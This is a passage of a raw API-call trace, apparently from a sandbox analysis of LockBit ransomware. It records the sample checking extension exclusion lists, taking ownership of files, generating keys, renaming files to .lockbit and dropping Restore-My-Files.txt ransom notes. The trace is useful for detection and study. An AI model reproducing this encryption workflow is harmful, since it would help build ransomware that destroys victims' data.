[0080.223] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.223] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.224] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.224] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.225] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Circle_VideoInset.png") returned 1 [0080.225] lstrcmpiW (lpString1="ntldr", lpString2="Circle_VideoInset.png") returned 1 [0080.225] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Circle_VideoInset.png") returned 1 [0080.225] lstrcmpiW (lpString1="bootsect.bak", lpString2="Circle_VideoInset.png") returned -1 [0080.225] lstrcmpiW (lpString1="autorun.inf", lpString2="Circle_VideoInset.png") returned -1 [0080.225] lstrcmpiW (lpString1="thumbs.db", lpString2="Circle_VideoInset.png") returned 1 [0080.225] lstrcmpiW (lpString1="iconcache.db", lpString2="Circle_VideoInset.png") returned 1 [0080.225] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.225] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png") returned=".png" [0080.225] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.225] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.225] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.225] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.226] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.226] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.lockbit") returned 74 [0080.226] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.227] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.227] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.227] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.227] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.228] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.228] RtlFreeAnsiString (AnsiString="\\") [0080.228] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0080.228] malloc (_Size=0x200) returned 0x77d800 [0080.228] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.228] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.228] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.228] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.228] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.229] CloseHandle (hObject=0x3ac) returned 1 [0080.229] free (_Block=0x77d800) [0080.229] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_videoinset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.229] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.229] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.229] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5059) returned 1 [0080.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.230] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.230] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.230] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.235] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.235] malloc (_Size=0xaa) returned 0x1ff1e60 [0080.235] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0080.241] free (_Block=0x1ff1e60) [0080.241] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_VideoInset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.241] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.241] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.241] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ea030de, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ea030de, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13d0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="cloud_Thumbnail.bmp", cAlternateFileName="")) returned 1 [0080.241] lstrcmpiW (lpString1=".", lpString2="cloud_Thumbnail.bmp") returned -1 [0080.241] lstrcmpiW (lpString1="..", lpString2="cloud_Thumbnail.bmp") returned -1 [0080.241] PathFindExtensionW (pszPath="cloud_Thumbnail.bmp") returned=".bmp" [0080.241] lstrcmpiW (lpString1=".386", lpString2=".bmp") returned -1 [0080.241] lstrcmpiW (lpString1=".cmd", lpString2=".bmp") returned 1 [0080.241] lstrcmpiW (lpString1=".exe", lpString2=".bmp") returned 1 [0080.241] lstrcmpiW (lpString1=".ani", lpString2=".bmp") returned -1 [0080.241] lstrcmpiW (lpString1=".adv", lpString2=".bmp") returned -1 [0080.241] lstrcmpiW (lpString1=".theme", lpString2=".bmp") returned 1 [0080.241] lstrcmpiW (lpString1=".msi", lpString2=".bmp") returned 1 [0080.241] lstrcmpiW (lpString1=".msp", lpString2=".bmp") returned 1 [0080.241] lstrcmpiW (lpString1=".com", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".diagpkg", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".nls", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".diagcab", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".lock", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".ocx", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".mpa", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".cpl", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".mod", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".hta", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".icns", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".prf", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".rtp", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".diagcfg", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".msstyles", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".bin", lpString2=".bmp") returned -1 [0080.242] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".shs", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".drv", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".wpx", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".bat", lpString2=".bmp") returned -1 [0080.242] lstrcmpiW (lpString1=".rom", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".msc", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".spl", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".ps1", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".msu", lpString2=".bmp") returned 1 [0080.242] lstrcmpiW (lpString1=".ics", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".key", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".mp3", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".reg", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".dll", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".ini", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".idx", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".sys", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".hlp", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".ico", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".lnk", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".rdp", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".lockbit", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="cloud_Thumbnail.bmp") returned 1 [0080.243] lstrcmpiW (lpString1="ntldr", lpString2="cloud_Thumbnail.bmp") returned 1 [0080.243] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="cloud_Thumbnail.bmp") returned 1 [0080.243] lstrcmpiW (lpString1="bootsect.bak", lpString2="cloud_Thumbnail.bmp") returned -1 [0080.243] lstrcmpiW (lpString1="autorun.inf", lpString2="cloud_Thumbnail.bmp") returned -1 [0080.243] lstrcmpiW (lpString1="thumbs.db", lpString2="cloud_Thumbnail.bmp") returned 1 [0080.243] lstrcmpiW (lpString1="iconcache.db", lpString2="cloud_Thumbnail.bmp") returned 1 [0080.243] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0080.243] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp") returned=".bmp" [0080.243] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0080.243] lstrcmpiW (lpString1=".7z", lpString2=".bmp") returned -1 [0080.243] lstrcmpiW (lpString1=".ckp", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dacpac", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".db", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".db-shm", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".db-wal", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".db3", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dbc", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dbs", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dbt", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".dbv", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".frm", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".mdf", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".mrg", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".mwb", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".myd", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".ndf", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".qry", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sdb", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sdf", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sql", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sqlite", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sqlite3", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".sqlitedb", lpString2=".bmp") returned 1 [0080.244] lstrcmpiW (lpString1=".tmd", lpString2=".bmp") returned 1 [0080.244] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.lockbit") returned 72 [0080.244] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.245] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.245] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.245] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.246] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.246] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.246] RtlFreeAnsiString (AnsiString="\\") [0080.246] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3ac) returned 0x0 [0080.246] malloc (_Size=0x200) returned 0x77d800 [0080.246] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0080.246] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.246] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.246] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.247] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0080.247] CloseHandle (hObject=0x3ac) returned 1 [0080.247] free (_Block=0x77d800) [0080.247] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\cloud_thumbnail.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0080.247] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.247] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.248] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=5072) returned 1 [0080.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.249] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.249] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.249] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0080.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.259] malloc (_Size=0xa6) returned 0x1ff1e60 [0080.259] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x1ff1e60, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0080.260] free (_Block=0x1ff1e60) [0080.260] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\cloud_Thumbnail.bmp" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0080.260] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0080.260] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.260] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee2d70a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee2d70a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4c9fff39, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5c9f, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Dot.png", cAlternateFileName="")) returned 1 [0080.260] lstrcmpiW (lpString1=".", lpString2="Dot.png") returned -1 [0080.260] lstrcmpiW (lpString1="..", lpString2="Dot.png") returned -1 [0080.260] PathFindExtensionW (pszPath="Dot.png") returned=".png" [0080.260] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.260] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.260] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.261] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.261] lstrcmpiW (lpString1=".reg", 